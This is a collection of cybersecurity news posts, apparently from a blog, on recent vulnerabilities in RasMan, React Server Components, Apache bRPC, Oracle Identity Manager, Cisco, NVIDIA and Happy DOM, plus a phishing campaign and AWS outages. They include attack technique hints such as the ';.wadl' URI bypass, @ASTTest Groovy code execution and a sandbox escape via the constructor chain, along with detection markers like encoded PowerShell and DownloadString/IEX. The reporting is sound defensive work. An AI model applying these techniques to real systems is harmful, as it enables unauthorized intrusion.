Category: Cyber News

  • RasMan RPC race condition lets local actors run code as SYSTEM

    RasMan RPC race condition lets local actors run code as SYSTEM

    A critical elevation-of-privilege vulnerability in the Windows Remote Access Connection Manager (RasMan) can be weaponized by a local attacker to execute arbitrary code with System privileges. The flaw centers on RasMan’s handling of RPC endpoints: if an attacker can register the trusted endpoint before RasMan does, privileged services may later communicate with the attacker’s process instead of the real service, enabling arbitrary command execution as SYSTEM.

    The exploit chain reported against this issue is notable because it combines two conditions. The primary, patched flaw (CVE-2025-59230) is the endpoint-registration race that enables privilege escalation when the attacker controls the endpoint first. In practice, however, RasMan normally starts at boot and registers that endpoint early, so the race window is small. To overcome this, researchers observed a second, previously undocumented crash vector: a logic error that can be triggered to intentionally crash RasMan, stop the service, and free the RPC endpoint so the attacker can register it and complete the exploitation chain.

    Technical summary

    RasMan registers an RPC endpoint that other privileged services trust. When that registration can be preempted, privileged inter-process communications may be redirected to an attacker-controlled process. The secondary crash vector involves a circular linked-list traversal where NULL pointers are not handled correctly, producing a memory-access violation that can crash RasMan and create the opportunity for endpoint re-registration. Because the two issues are used together in the observed exploit chain, full exploitation requires both the race-condition behavior and the ability to reliably stop the service first.

    Mitigations

    Microsoft issued official patches addressing the elevation-of-privilege weakness (CVE-2025-59230) as part of the October 2025 security updates. At the time the issue was publicly described, the crash-trigger used to facilitate the attack had not been addressed in Microsoft’s official updates; a third party released micropatches targeting that crash vector across supported platforms. Administrators should apply the October 2025 updates immediately and evaluate whether supplemental mitigations or third-party micropatches are necessary in environments where the crash vector would materially increase risk.

    Recommendations

    Prioritize deployment of the vendor-supplied updates for CVE-2025-59230 across endpoints and servers. Where rapid patching is constrained, consider compensating controls that reduce the risk of local, unprivileged users being able to execute code (for example, strict local user privilege management, application control, and endpoint monitoring for unexpected service crashes and suspicious RPC registrations). Log and alert on unusual RasMan start/stop activity and on processes that register RPC endpoints typically owned by system services.

    Final note

    The primary flaw was addressable through standard vendor patching, but the presence of a companion crash vector shows the necessity of defense in depth, combining timely patching, principle-of-least-privilege controls, and robust monitoring. Automated or out-of-cycle mitigations are valuable when attack chains rely on secondary, unpatched behaviors; however, long-term risk is best reduced by eliminating the underlying code defects in the trusted service.

  • React2Shell RCE: Active Exploitation of Unsafe Deserialization in Server Components

    React2Shell RCE: Active Exploitation of Unsafe Deserialization in Server Components

    It is another Monday, and unfortunately, we are starting the week with a critical development in the application security landscape. A new Remote Code Execution (RCE) vulnerability, which we are tracking as CVE-2025-55182 or “React2Shell,” has moved from theoretical risk to active exploitation in the wild. This isn’t just a minor patch warning; it involves a fundamental unsafe deserialization flaw within the React Server Components Flight protocol, effectively opening the door for unauthenticated attackers to execute arbitrary code on affected systems. If you are running React or downstream ecosystems like Next.js, this needs to be at the top of your triage list today.

    The Industrialization of Exploitation

    What strikes me most about the telemetry from researchers at GreyNoise is the speed and automation of these attacks. We aren’t seeing manual, tentative poking at firewalls here. Instead, the data reveals a highly automated, opportunistic campaign. Attackers are leveraging botnets—including evolutions of the notorious Mirai—to scan for this vulnerability at scale. The traffic patterns are distinctively non-organic; the fingerprints of the TCP stacks and HTTP clients scream “automation” rather than human browsing.

    Deconstructing the Attack Chain

    The exploitation chain observed in the field typically begins with unauthenticated probes against the Flight protocol surface, followed by small proof-of-execution commands. Successful probes are followed by encoded PowerShell stagers, which commonly use reflection and AMSI-evasion primitives. Network telemetry often shows requests from diverse ASNs and IPs concentrated in several regions, and telemetry platform signatures include Go-http-client and various scanner user agent strings. On endpoints, defenders should prioritize detection of PowerShell process creation with encoded command arguments, unusual use of DownloadString/IEX, and script blocks containing AMSI-bypass markers.

    Practical mitigation and response priorities

    Organizations running React Server Components or frameworks that consume them must treat this vulnerability as high priority. The primary steps are straightforward: apply vendor patches or mitigations for the Flight protocol, restrict public exposure of server component endpoints where possible, and harden detection and containment controls. On the detection side, blocklists that target the campaign’s observed IPs and JA3/JA4 fingerprints can reduce noisy exploitation attempts, while endpoint telemetry should be tuned to flag the characteristic PowerShell validation and encoded-stager activity described above. Incident responders should also be prepared to triage signs of post-exploitation activity commonly associated with automated botnets and commodity toolkits.

    Monitoring and threat intelligence recommendations

    Continuous monitoring of server logs for unusual POSTs against server component endpoints, rapid repeat attempts with arithmetic-style commands, and spikes in small deterministic responses are useful early indicators. Enriching alerts with ASN and user-agent fingerprinting, and integrating threat feeds that capture the campaign’s IP infrastructure, will improve automated blocking and analyst triage. Because attackers have been observed integrating exploit code into botnet toolsets, defenders should assume opportunistic re-use across varying threat actors and prepare for follow-on lateralization attempts if a host is compromised.

    Final thoughts

    I view React2Shell as a clear example of how modern web-framework features can expand an application’s attack surface when unsafe deserialization is present. The exploitation activity is opportunistic and automated, which means the risk grows quickly for internet-exposed services that lag on updates. Organizations should assume that simple, reproducible probes will appear in their logs and prioritize patching, exposure reduction, and detection rules that focus on the small, telltale PowerShell validations and encoded stagers seen in the wild. Treating this as an urgent operational task will materially reduce the likelihood of successful compromise.

  • Critical Flaw in Apache bRPC Framework (CVE-2025-59789)

    Critical Flaw in Apache bRPC Framework (CVE-2025-59789)

    This week, I want to dive into a pretty serious vulnerability that just dropped. It involves the Apache bRPC framework. If you’re into backend development, this is a textbook example of how a simple parsing issue can turn into a major security issue.

    CVE-2025-59789, a security vulnerability that has been discovered in the Apache bRPC framework, with a maximum assigned CVSS score of 9.8 (Critical). This network-based flaw could permit a remote attacker to induce a denial-of-service (DoS) attack.

    Technical Analysis

    The vulnerability is rooted in the json2pb component, which converts JSON data into Protocol Buffer messages. This component relies on the rapidjson parser, which utilizes a recursive parsing method by default.

    The flaw is classified as Uncontrolled Recursion / Stack Overflow. An attacker can submit their own JSON data containing a deeply nested recursive structure. When the rapidjson parser attempts to process this input, the recursive function calls rapidly exhaust the available stack space, leading to a stack overflow. This results in an immediate crash of the bRPC server, which would lead to a DoS.

    Risk Assessment

    The vulnerability affects all versions of Apache bRPC before 1.15.0. Organizations that use this framework face a critical risk if their deployments meet the following criteria:

    • Running a bRPC server configured to handle HTTP+JSON requests that originate from untrusted external networks.
    • Employing the JsonToProtoMessage function to convert JSON data derived from any unvalidated or untrusted input source.

    Required Action

    Apache has provided definitive steps to remediate this vulnerability. Security teams are strongly advised to apply one of the following countermeasures immediately:

    1. Upgrade: Update the Apache bRPC framework to version 1.15.0 or higher, which includes the security fix.
    2. Patch: In any environment unable to execute a full version upgrade, apply the official patch made available on the Apache GitHub repository.

    Both mitigation options introduce a recursion depth limit to the parsing process, with a default value of 100. This boundary is applied to key conversion functions, including JsonToProtoMessage. Any incoming JSON or Protocol Buffer messages that exceed this depth limit will be rejected, which would prevent the stack exhaustion condition. Administrators requiring a greater recursion depth for specific operational requirements may have to manually adjust this parameter via the json2pb_max_recursion_depth gflag.

  • Oracle Identity Manager RCE Vulnerability

    Oracle Identity Manager RCE Vulnerability

    Organizations are being alerted by the Cybersecurity & Infrastructure Security Agency (CISA) about a critical security flaw in Oracle Identity Manager that requires my immediate attention. The vulnerability — tracked as CVE‑2025‑61757 — allows attackers who aren’t authenticated to execute arbitrary code on systems, which could lead to a full-scale compromise of enterprise or government networks.

    It turns out this issue was discovered by researchers at Searchlight Cyber while they were analyzing the attack surface of Oracle Cloud Login. They found that the same software stack behind that earlier massive breach contained this serious flaw.

    How It Happened

    The root cause lies in a misconfigured authentication filter inside the web.xml of the application’s SecurityFilter mechanism. The developers meant to allow certain unauthenticated access (to WADL files via a regular-expression whitelist), but they overlooked how Java treats request URIs with matrix parameters. Attackers can append something like ;.wadl to the URI, fooling the server into treating the request as a harmless WADL retrieval while in fact it’s processed as a privileged API call. That bypass allows access to restricted REST endpoints without credentials.

    Once authentication is bypassed, an attacker can access endpoints like groovyscriptstatus, which were intended only for syntax checking of Groovy scripts. Because the endpoint performs compilations, the attacker can inject a script that uses the @ASTTest annotation to trigger arbitrary code execution during compile time — effectively granting them a full remote shell.

    This is particularly dangerous: an attacker needs no valid credentials, just the vulnerable application exposed, and then they can remotely execute code. That makes this extremely appealing for ransomware groups or state-sponsored actors.

    If you’re running Oracle Identity Governance Suite 12c (version 12.2.1.4.0) or similar, you need to isolate your affected systems from the internet to avoid full system compromise, or update/patch.

  • Cisco Catalyst Center Vulnerability

    Cisco Catalyst Center Vulnerability

    A critical security flaw has been discovered in the Cisco Catalyst Center Virtual Appliance (running on VMware ESXi) that allows attackers with relatively low permissions to escalate their access to full administrator level. According to the advisory, this vulnerability is tracked as CVE-2025-20341 and carries a high severity, with a CVSS score of 8.8.

    The root cause of this vulnerability is poor input validation: the appliance doesn’t properly sanitize HTTP requests, so an attacker can submit specially crafted data that tricks the system into elevating privileges. What’s especially concerning is how easily it can be exploited: someone with only Observer-level credentials—just read-only access—can leverage this bug to gain Administrator rights.

    Once an attacker becomes an administrator, they can do practically anything: create new user accounts, change system settings, or otherwise undermine the network’s security posture.

    Cisco identified the issue internally while working on a support case. They have released a fix: version 2.3.7.10-VA of the virtual appliance patches the flaw, and users who are running affected versions (2.3.7.3-VA and later) should update immediately. Notably, hardware appliances and AWS-based virtual appliances are not affected by this particular issue.

    Unfortunately, there are no workarounds — the only way to secure systems is to apply the software update.

    What I Think About This

    I believe this vulnerability is very serious. Giving an “Observer” the ability to escalate to admin is a major misstep, especially in network-management tools where administrator access usually means full control over configurations.

    On the upside, Cisco has already addressed the issue with a specific fixed version, which shows that they took the risk seriously. But still, any delay in updating could leave critical infrastructure exposed. So, in my view, if you’re using Catalyst Center Virtual Appliance, you need to act now and deploy the patch.

  • NVIDIA App for Windows Vulnerability — Why You Should Update Now

    NVIDIA App for Windows Vulnerability — Why You Should Update Now

    There’s serious vulnerability in the NVIDIA App for Windows that I feel is important to pass along. The flaw is tracked as CVE‑2025‑23358 and it affects the installer component of the app. Essentially, if someone has even low privileged local access to a machine with this version of the NVIDIA App, they could exploit the search-path logic to inject malicious code and escalate privileges on the system.

    What the issue is

    The problem is due to a search-path element vulnerability (classified under CWE‑427) in the NVIDIA App installer. By manipulating how the installer loads modules or executables via its search path, an attacker with local access can trick the system into running malicious code. The requirement is local access plus a bit of user interaction, but once successful, the result is full code execution and the ability to elevate privileges.

    This vulnerability got a base CVSS v3.1 score of 8.2, which puts it in the “High” severity range. Because of the low complexity of the attack and the way it affects installations that often run with elevated rights, it’s especially risky in shared or enterprise environments.

    If you’re running a version of the NVIDIA App for Windows that is before version 11.0.5.260, you are exposed. The installer component is vulnerable until you apply the patch.

    What you should do

    I recommend updating immediately to version 11.0.5.260 or later of the NVIDIA App. Make sure you get it from the official NVIDIA site. If you’re managing multiple workstations (especially in a corporate setting), you should check your software inventory to find any systems still running the older version and push the update out quickly.

    It’s easy to overlook utilities such as the NVIDIA App as “just extra” software, but installers and their elevated execution context are common targets for attackers. This incident reinforces the importance of keeping all software—especially those with high privileges—up to date and audited.

  • Multilingual ZIP File Phishing Campaign Targets Asia

    Multilingual ZIP File Phishing Campaign Targets Asia

    While digging through some recent cybersecurity reports, I came across a fascinating and concerning campaign. Threat actors have been running a large-scale phishing operation using multilingual ZIP files to target organizations across East and Southeast Asia. It wasn’t just random spam — it was coordinated, multilingual, and very calculated.

    They used Traditional Chinese, English, and Japanese to tailor their attacks to each region. The emails and web templates were customized to look as authentic as possible, depending on who they were targeting. It’s one of those times where I realize how advanced phishing operations have become — they feel more like marketing campaigns than old-school scams.

    How the Attack Spread

    At first, the attackers focused on Taiwan. They pretended to be the country’s Ministry of Finance and sent out fake PDFs hosted on cloud platforms. Eventually, they leveled up by creating their own infrastructure, registering domains that looked official — often ending in “.tw” — and expanding their reach into Japan and other Southeast Asian countries.

    They used clever tricks to avoid detection. When someone landed on their fake website, a hidden script called visitor_log.php would quietly collect information about the visitor — things like IP address and browser type. Only after that would a download button appear, leading to a ZIP file that seemed harmless but contained malicious content. The way they designed it made it almost invisible to most filters.

    Inside the ZIP Files

    The files inside these ZIP archives were disguised to look like everyday business documents. They had names like “Payroll Report,” “Tax Summary,” or “Financial Confirmation.” On the surface, they appeared professional and legitimate, which helped them bypass many content-based filters and fool even cautious employees.

    Another detail that stood out to me was how these phishing pages all seemed to share the same structure. The same file names kept appearing across multiple sites — download.php, visitor_log.php, and others — suggesting that all of them were powered by a shared backend or some kind of phishing kit. It’s like the attackers had created a framework they could deploy anywhere, in any language.

    Distributed Hosting

    The infrastructure behind this campaign wasn’t limited to one region. The domains were hosted by a Hong Kong-based provider but spread across several major cities like Tokyo, Singapore, and Hong Kong. This distributed setup made it much harder for defenders to block the entire operation, since every time one domain went down, another one could easily take its place.

    My Opinion

    To me, this campaign really highlights how professional and methodical cybercriminals have become. They understand language, culture, and how to manipulate trust. What used to be simple, mass spam attacks have evolved into region-specific, data-driven phishing campaigns that can fool even experienced users.

    The use of multilingual content, customized ZIP files, and distributed hosting shows that these attackers are treating cybercrime like a global business. It’s efficient, adaptive, and hard to detect. I think this kind of operation is a glimpse into where phishing is headed — smarter, more targeted, and far more dangerous than before.

  • AWS Outage: What Really Happened and What We Can Learn From It

    AWS Outage: What Really Happened and What We Can Learn From It

    What we talked about last week — that huge AWS outage — just got even more interesting.

    I’ve been following the story closely, and the scale of what happened really shows how dependent so many organizations are on Amazon’s cloud. Around the same time as the previous incident, AWS’s US-East-1 region experienced another massive disruption that rippled across countless apps, websites, and internal systems worldwide.

    It all started when DNS resolution issues within AWS’s own infrastructure caused services to fail at connecting properly. Basically, the system that tells computers where to find each other stopped working the way it should. Once that broke, the effects cascaded into other services like storage, databases, and computing instances.

    The Ripple Effect

    When something like this happens inside a provider as large as Amazon, it doesn’t just stay within their ecosystem. Businesses that depend on AWS for hosting, analytics, or even authentication suddenly find themselves offline. Streaming platforms, banking apps, e-commerce stores, and even schools felt the hit.

    Even though AWS resolved the issue within hours, the damage was already done — downtime, lost transactions, delayed services, and frustrated users everywhere.

    My Take on It

    This outage reinforced something I’ve always said: no system is too big to fail. Even a company with the resources and experience of Amazon can run into infrastructure breakdowns.

    That’s why redundancy and smart design matter so much. Relying on a single cloud region or provider is a recipe for disruption. I always recommend setting up multi-region backups, strong monitoring tools, and clear response plans so that when an outage hits, your operations don’t grind to a halt.

    Another key lesson is transparency — if your users are affected, communicate quickly. People are more forgiving when they’re informed.

    Final Thoughts

    Whether it’s a misconfiguration, an internal update, or something more serious, incidents like this remind us that resilience is just as important as performance. For me, it’s not about pointing fingers at AWS — it’s about learning from the chaos and using it to build systems that can withstand it.

    The cloud gives us incredible power and flexibility, but it also means we all share the same risks when something that big goes down.

  • AWS Outage Resolved After 24 Hours Of Disruption

    AWS Outage Resolved After 24 Hours Of Disruption

    Everyone knows who Amazon is — they’re massive in cloud computing, hosting services for countless organizations globally, including schools. So when a company that big encounters a service disruption, it resonates widely. Here’s how the recent Amazon Web Services (AWS) outage was resolved:

    On October 19, 2025 in the US-East-1 region, I noticed elevated error rates and latency across multiple AWS services. It began around 11:49 PM PDT.
    The root cause was traced by 12:26 AM PDT the next day to a faulty DNS update. This prevented applications from resolving server IPs — like a broken phonebook for the internet.
    Because of that, more than 100 AWS services were affected. Services that relied on the core database service DynamoDB in particular caused cascading failures — for example, EC2 launches stalled, Lambda functions had issues, load balancer health checks failed.

    As a user or system administrator, the ripple effects were visible everywhere: gaming platforms went offline, financial apps had login failures, even Amazon’s own systems (like Prime Video and e-commerce checkout) saw disruption.

    How It Was Fixed

    Here’s what AWS did to bring the systems back online:

    • They flushed DNS caches and applied the fix for the core DynamoDB DNS issue by about 2:24 AM PDT.
    • They temporarily throttled some operations (for example, asynchronous Lambda invocations, EC2 instance launches) to stabilize dependent subsystems.
    • By around 3:01 PM PDT, AWS had confirmed that all services were fully restored, though some data-processing backlogs (for example in Redshift and Connect) remained to be cleared.

    Final Thoughts

    Contrary to what many people thought, this outage wasn’t caused by a cyberattack — rather, it appears to have been an internal update gone wrong.

    Still, it’s a vivid reminder: even the biggest cloud provider can experience a disruption, and when they do, many of us feel it. Thinking proactively about architectural resilience and dependent-service risk is more important than ever.

  • Happy DOM Vulnerability: 2.7 Million Users Exposed To Remote Code Execution Attacks

    Happy DOM Vulnerability: 2.7 Million Users Exposed To Remote Code Execution Attacks

    I recently came across a serious security issue in Happy DOM, a popular JavaScript DOM implementation used by around 2.7 million users weekly. The flaw affects versions up to v19 and exposes systems to Remote Code Execution (RCE) risks.

    In my review, I found that Happy DOM’s Node.js VM context isn’t truly isolated. Because JavaScript evaluation (via eval() and Function()) is enabled by default, untrusted code can escape the sandbox. In other words, an attacker could craft malicious JavaScript that climbs the constructor chain and gains access to the process-level Function constructor, breaking out of the supposed safe environment.

    The type of module system (CommonJS vs ESM) matters here. In a CommonJS setup, the attacker might get access to the require() function, load Node.js modules, and perform unauthorized actions.

    This vulnerability is a major concern especially for server-side rendering (SSR) frameworks or any server that processes external HTML content. Here are some of the attack scenarios I identified:

    • Data exfiltration: The attacker could access environment variables, configuration files, secrets.
    • Lateral movement: If the compromised server has network access, internal systems could be reached.
    • Full code execution: Executing arbitrary commands by spawning child processes is possible.
    • Persistence: The attacker could modify the filesystem to keep long-term footholds inside the system.

    What to do

    Here are the steps I’m recommending:

    Disable evaluation: If an immediate update isn’t possible, turn off JavaScript evaluation unless you’re confident all processed content is fully trusted.

    Update: Move to Happy DOM version 20 or newer, which disables JavaScript evaluation by default and shows a warning if you turn it on in an insecure environment.

    Configuration: If you must use safe JavaScript evaluation, run Node.js with the --disallow-code-generation-from-strings flag. That blocks eval() and Function() at the process level.